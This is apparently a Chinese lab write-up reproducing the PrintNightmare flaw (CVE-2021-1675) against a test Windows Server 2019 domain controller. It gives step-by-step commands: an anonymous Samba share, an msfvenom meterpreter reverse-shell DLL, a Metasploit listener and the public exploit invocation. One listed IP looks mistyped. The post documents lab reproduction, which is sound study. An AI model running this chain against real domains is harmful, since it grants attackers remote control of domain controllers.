微软漏洞 Cve-2021-1675复现

受影响版本

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows RT 8.1

  • Windows 8.1 for x64-based systems

  • Windows 8.1 for 32-bit systems

  • Windows 7 for x64-based Systems Service Pack 1

  • Windows 7 for 32-bit Systems Service Pack 1

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2016

  • Windows 10 Version 1607 for x64-based Systems

  • Windows 10 Version 1607 for 32-bit Systems

  • Windows 10 for x64-based Systems

  • Windows 10 for 32-bit Systems

  • Windows Server, version 20H2 (Server Core Installation)

  • Windows 10 Version 20H2 for ARM64-based Systems

  • Windows 10 Version 20H2 for 32-bit Systems

  • Windows 10 Version 20H2 for x64-based Systems

  • Windows Server, version 2004 (Server Core installation)

  • Windows 10 Version 2004 for x64-based Systems

  • Windows 10 Version 2004 for ARM64-based Systems

  • Windows 10 Version 2004 for 32-bit Systems

  • Windows 10 Version 21H1 for 32-bit Systems

  • Windows 10 Version 21H1 for ARM64-based Systems

  • Windows 10 Version 21H1 for x64-based Systems

  • Windows Server, version 1909 (Server Core installation)

  • Windows 10 Version 1909 for ARM64-based Systems

  • Windows 10 Version 1909 for x64-based Systems

  • Windows 10 Version 1909 for 32-bit Systems

  • Windows Server 2019 (Server Core installation)

  • Windows Server 2019

  • Windows 10 Version 1809 for ARM64-based Systems

  • Windows 10 Version 1809 for x64-based Systems

  • Windows 10 Version 1809 for 32-bit Systems

准备环境:kali:192.168.173.133
域控:Windows 2019 192.168.173.139(必须是2019或者2016)

首先,创建一个域控(创建域控步骤忽略):

微软漏洞 Cve-2021-1675复现_第1张图片

创建一个普通域用户:

微软漏洞 Cve-2021-1675复现_第2张图片

微软漏洞 Cve-2021-1675复现_第3张图片

微软漏洞 Cve-2021-1675复现_第4张图片

微软漏洞 Cve-2021-1675复现_第5张图片

微软漏洞 Cve-2021-1675复现_第6张图片

Windows机默认都是开启print Spooler服务的,不然无法实现打印;

微软漏洞 Cve-2021-1675复现_第7张图片

1.先把作者的impacket包下载下来运行,链接为

https://github.com/cube0x0/impacket

微软漏洞 Cve-2021-1675复现_第8张图片

运行

cd impacket
python3 ./setup.py install

微软漏洞 Cve-2021-1675复现_第9张图片

2.开启匿名访问smb

2.1 配置/etc/samba/smb.conf
这里我使用原作者的也不行,后面参考了Gamma实验室公众号的配置才可以成功访问,链接在此:https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ

微软漏洞 Cve-2021-1675复现_第10张图片

[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes

配置完后,启动smbd

sudo service smbd start

因为spoolsv.exe是x64的,所以生成的dll也得是x64,生成dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.153.133 LPORT=7893 -f dll -o /tmp/rever.dll

微软漏洞 Cve-2021-1675复现_第11张图片

开启监听

msfconsole
use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.173.133
set lport 7893
run

微软漏洞 Cve-2021-1675复现_第12张图片

exp链接:

https://github.com/cube0x0/CVE-2021-1675

微软漏洞 Cve-2021-1675复现_第13张图片

直接上exp

python3 CVE-2021-1675.py 域名/域普通用户名:用户密码@域控IP smb共享文件的路径

微软漏洞 Cve-2021-1675复现_第14张图片

微软漏洞 Cve-2021-1675复现_第15张图片

微软漏洞 Cve-2021-1675复现_第16张图片

最后一步这里我出现了一个玄学问题,一直上不了线,哪怕是拿师兄能够上线的虚拟机环境拷贝到我电脑上也不行,所以这里就让他截了个图。。周末重装系统去,这种情况不是第一次了,重装系统解决100%的问题。

你可能感兴趣的:(系统安全)